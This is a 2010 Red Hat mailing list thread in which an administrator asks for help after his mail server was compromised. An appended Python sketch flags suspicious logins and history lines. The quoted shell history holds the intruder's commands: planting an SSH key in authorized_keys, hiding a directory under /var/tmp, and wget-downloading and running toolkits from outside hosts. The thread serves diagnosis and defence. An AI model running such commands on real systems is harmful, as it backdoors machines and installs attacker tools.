I use PuTTY for remote login.

On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:

> Still, I'm thinking: how did he/she get my password??
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:
>
>> I have changed my root password.
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL 5.3 as my mail server with a real IP. I configure my
>>> system mostly remotely. The last login time of my system was 27 Jan
>>> from this IP: 118.129.153.43.
>>> Then I tried to log in on 28 Jan in the morning, and I couldn't
>>> authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root, then I ran the "last" command. I am sending the
>>> first 10 lines of the last command... I think someone hacked my system.
>>> I am sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*.
>>>
>>> Please suggest what this is??
>>>
>>> Thanks
>>>
>>> last command output:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........ this is not my IP.
>>>
>>> History Output
>>>
>>>   115  cat /proc/cpuinfo
>>>   116  mkdir .ssh
>>>   117  cd .ssh
>>>   118  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>>   119  cd /var/tmp
>>>   120  mkdir " "
>>>   121  cd " "
>>>   122  passwd
>>>   123  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>>   124  ps -x
>>>   125  cd /var/tmp
>>>   126  w
>>>   127  wget http://kok.ucoz.de/gosh.tgz
>>>   128  tar xvf gosh.tgz
>>>   129  cd gosh
>>>   130  chmod +x *
>>>   131  ./go.sh 121
>>>   132  w
>>>   133  ps -x
>>>   134  ps -aux
>>>   135  cd /var/tmp
>>>   136  cd " "
>>>   137  ls -a
>>>   138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>>   139  tar xzvf fld.tgz
>>>   140  cd fld
>>>   141  chmod +x *
>>>   142  nano cyc.acc
>>>   143  nano cyc.acc.1
>>>   144  nano cyc.set
>>>   145  ./httpd
>>>   146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
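
A triage sketch for the kind of `last` and `history` output quoted in this thread, added here as an example and not part of any message in the thread: it lists remote root sessions from sources the administrator does not recognise and tags history lines matching the pattern seen in the post (a key appended to authorized_keys, work under /var/tmp, a directory named with a single space, a download, a password change). The sample data is constructed (documentation-range addresses, placeholder key and URL), and the function names and the `known_sources` allowlist are assumptions.

```python
import re

# Constructed sample modelled on the `last` and `history` output in the post;
# addresses are documentation ranges, the key and URL are placeholders.
LAST_SAMPLE = """\
root     pts/1        198.51.100.20    Thu Jan 28 10:58   still logged in
root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
root     pts/2        host-203-0-113-9 Thu Jan 28 01:42 - 01:52  (00:09)
root     pts/2        203.0.113.77     Wed Jan 27 22:31 - 22:32  (00:01)
"""
HISTORY_SAMPLE = """\
  116  mkdir .ssh
  118  echo ssh-rsa AAAA...PLACEHOLDER note >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys
  119  cd /var/tmp
  120  mkdir " "
  122  passwd
  127  wget http://example.invalid/tool.tgz
  132  w
"""

# Only pts/N lines carry a remote source; console (tty1) and reboot lines have
# no host column, so they are skipped instead of being mis-parsed.
LAST_RE = re.compile(r"^(\S+)\s+(pts/\d+)\s+(\S+)\s+(\w{3} \w{3}\s+\d+ \d\d:\d\d)")
INDICATORS = [
    ("authorized_keys write", re.compile(r">>?\s*\S*authorized_keys")),
    ("download", re.compile(r"\b(wget|curl)\b.*https?://")),
    ("temp dir as workspace", re.compile(r"\bcd\s+(/var/tmp|/tmp|/dev/shm)\b")),
    ("whitespace-only directory name", re.compile(r'\b(mkdir|cd)\s+"\s+"')),
    ("password change", re.compile(r"^passwd\b")),
]

def unknown_root_logins(last_text, known_sources):
    """Return (source, start time) for remote root sessions from unlisted sources."""
    matches = (LAST_RE.match(line) for line in last_text.splitlines())
    return [(m.group(3), m.group(4)) for m in matches
            if m and m.group(1) == "root" and m.group(3) not in known_sources]

def history_findings(history_text):
    """Return (history number, label) for every indicator a history line matches."""
    out = []
    for line in history_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.*)", line)
        if m:
            out += [(int(m.group(1)), label) for label, rx in INDICATORS if rx.search(m.group(2))]
    return out

if __name__ == "__main__":
    print(unknown_root_logins(LAST_SAMPLE, {"198.51.100.20"}))
    print(history_findings(HISTORY_SAMPLE))
```

Shell history can be edited by whoever held the session, so an empty result here does not show that a host is clean.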